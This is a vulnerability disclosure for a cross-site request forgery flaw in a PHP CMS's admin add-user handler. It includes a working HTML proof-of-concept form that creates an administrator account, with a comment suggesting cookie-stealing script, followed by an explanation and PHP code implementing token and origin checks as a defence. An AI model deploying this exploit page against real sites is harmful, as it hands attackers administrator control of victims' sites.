Vulnerability discoverer: 惜潮. A malicious attacker can craft an HTML page that adds an administrator account in order to compromise the site. Exploit code. The exp code is as follows:
```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>csrf测试</title>
</head>
<body>
    <form action="http://127.0.0.1//14/index.php?m=admin&c=access&a=adduserhandle" method="POST" id="transfer" name="transfer">
        <input type="hidden" name="user_id0" value="1">
        <input type="hidden" name="user_login" value="test1">
        <!-- JS could be inserted here to collect cookies (csrf+xss) -->
        <input type="hidden" name="password" value="test1">
        <input type="hidden" name="rpassword" value="test1">
        <input type="hidden" name="user_nicename" value="123">
        <input type="hidden" name="user_email" value="123%40Qq.com">
        <input type="hidden" name="user_url" value="www.baidu.com">
        <input type="hidden" name="user_intro" value="test">
        <input type="hidden" name="user_status" value="1">
        <input type="hidden" name="role_id" value="1">
        <button type="submit" value="Submit">添加管理员</button>
    </form>
</body>
</html>
```
The permission for ?m=admin&c=access&a=adduserhandle has to be set by an administrator before it can execute. Otherwise nothing is written to the database.
A CSRF attack generally means that after the administrator has logged in, they visit a CSRF page carefully constructed by the attacker; the browser attaches the administrator's cookies to the request, so the operation is executed with the administrator's identity. The usual defences are to check the source of the page request, or to add a random token.
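The two defences named in the reply above, a per-session random token and a request-source check, applied to an admin form handler. This is an added example written for this page, not code from the project or from either commenter; the handler path, the `csrf_token` field name, the session key and the site origin constant are assumptions.

```php
<?php
// Added example (not the project's code): CSRF defence for a state-changing
// admin action, using a session-bound random token plus an Origin/Referer check.
// SITE_ORIGIN, the session key and the form field name are assumptions.

session_start();

const SITE_ORIGIN = 'http://127.0.0.1'; // assumption: the site's own origin

// Issue (or reuse) a random token bound to the current session.
// A cross-origin page cannot read this value, so a forged form cannot include it.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reduce a URL to its origin (scheme://host[:port]); empty string if unparsable.
function origin_of(string $url): string {
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return '';
    }
    $origin = $parts['scheme'] . '://' . $parts['host'];
    if (isset($parts['port'])) {
        $origin .= ':' . $parts['port'];
    }
    return $origin;
}

// Both checks must pass before any database write happens.
function csrf_check(array $post, array $server): bool {
    // 1. Token check: constant-time comparison against the session copy.
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = (string)($post['csrf_token'] ?? '');
    if ($expected === '' || !hash_equals($expected, $given)) {
        return false;
    }
    // 2. Source check: browsers send Origin on cross-origin form POSTs;
    //    fall back to Referer, and reject when neither is present.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source === '') {
        return false;
    }
    return origin_of($source) === SITE_ORIGIN;
}

// Rendering the legitimate add-user form: embed the token as a hidden field.
function render_add_user_form(): string {
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="POST" action="index.php?m=admin&c=access&a=adduserhandle">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input type="text" name="user_login">'
         . '<button type="submit">Add user</button></form>';
}

// Hypothetical handler for a=adduserhandle: refuse before touching the database.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_check($_POST, $_SERVER)) {
        http_response_code(403);
        exit('CSRF check failed');
    }
    // ... validate input and add the user here ...
    // Rotate the token after a successful state change so it cannot be replayed.
    unset($_SESSION['csrf_token']);
}
```

A form submitted from the attacker's page, like the one in the report, carries no `csrf_token` field and arrives with a foreign `Origin`, so it is rejected at step 1 before step 2 is even reached. Marking the session cookie `SameSite=Lax` or `Strict` adds a third, browser-enforced layer, but the server-side token remains the check the application itself controls.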